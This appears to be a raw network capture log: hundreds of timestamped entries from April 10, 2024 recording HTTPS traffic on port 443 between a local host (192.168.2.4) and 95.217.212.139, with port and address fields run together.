                                                                                                                                                                                                          Apr 10, 2024 08:56:39.123533964 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.123577118 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.123619080 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.123631001 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.123660088 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.123683929 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.131558895 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.131601095 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.131653070 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.131664991 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.131726980 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.131746054 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.138262987 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.138339043 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.138350010 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.138361931 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.138401031 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.138439894 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.145889044 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.145931005 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.145998001 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.146013975 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.146049023 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.146064043 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.151705980 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.151746988 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.151915073 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.151915073 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.151931047 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.152100086 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.158838034 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.158885002 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.158948898 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.158966064 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.159001112 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.159022093 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.164871931 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.164911985 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.164971113 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.164982080 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.165009022 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.165040970 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.171746016 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.171788931 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.171843052 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.171855927 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.171894073 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.171935081 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.178016901 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.178060055 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.178277969 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.178291082 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.178396940 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.183698893 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.183753014 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.183809042 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.183820963 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.183887005 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.190165997 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.190212965 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.190274000 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.190285921 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.190314054 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.190341949 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.195565939 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.195609093 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.195664883 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.195674896 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.195702076 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.195724964 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.201442957 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.201484919 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.201597929 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.201597929 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.201611042 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.201807022 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.206604004 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.206645012 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.206697941 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.206708908 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.206741095 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.206763983 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.212585926 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.212629080 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.212662935 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.212673903 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.212703943 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.212724924 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.217997074 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.218039989 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.218142986 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.218153954 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.218214989 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.218214989 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.222943068 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.222984076 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.223032951 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.223043919 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.223100901 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.223119020 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.228571892 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.228615046 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.228693962 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.228704929 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.228898048 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.228898048 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.233309984 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.233351946 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.233400106 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.233409882 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.233511925 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.238409996 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.238468885 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.238495111 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.238504887 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.238538980 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.238575935 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.243001938 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.243045092 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.243187904 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.243201017 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.243251085 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.248724937 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.248766899 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.248807907 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.248819113 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.248850107 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.248869896 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253333092 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253372908 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253411055 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253421068 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253571033 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.253571033 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258866072 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258908033 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258975983 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.258986950 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.259084940 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264074087 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264128923 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264168978 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264180899 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264208078 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.264265060 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268585920 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268630981 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268673897 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268687010 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268716097 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.268747091 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272864103 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272907019 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272952080 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272963047 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.272990942 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.273016930 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277308941 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277399063 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277442932 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277453899 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277482986 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.277499914 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282166004 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282210112 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282263994 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282274961 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282303095 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.282325983 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286297083 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286339998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286386013 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286396980 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286422014 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.286438942 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.290915966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.290956974 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.291002989 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.291013956 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.291071892 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294812918 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294853926 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294898987 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294909954 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294938087 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.294969082 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298762083 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298804045 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298846960 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298861980 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298887014 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.298916101 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302690983 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302747011 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302794933 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302805901 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302834034 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.302870989 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307596922 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307684898 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307756901 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307768106 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307816029 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.307836056 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311239958 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311280966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311330080 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311341047 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311391115 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.311408997 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316051006 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316092014 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316143990 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316154957 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316183090 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.316205025 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319766998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319808960 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319856882 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319866896 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319895983 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.319916010 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323306084 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323345900 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323390961 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323400974 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323427916 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.323450089 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.326878071 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.326931000 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.326960087 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.326971054 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.326997995 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.327013969 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.331156969 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.331197977 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.331240892 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.331258059 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.331281900 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.331306934 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.334583998 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.334629059 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.334672928 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.334683895 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.334712029 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.334733009 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.337969065 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.338009119 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.338047028 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.338057041 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.338087082 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.338107109 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.342205048 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.342247009 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.342287064 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.342297077 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.342323065 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.342349052 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.345474005 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.345515966 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.345561981 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.345571995 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.345597982 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.345623016 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.348706961 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.348747969 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.348790884 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.348802090 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.348880053 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.348917007 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.351907015 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.351948023 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.351995945 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.352005959 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.352030993 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.352061987 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.355854988 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.355897903 CEST4434976195.217.212.139192.168.2.4
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.355942965 CEST49761443192.168.2.495.217.212.139
                                                                                                                                                                                                          Apr 10, 2024 08:56:39.355953932 CEST4434976195.217.212.139192.168.2.4
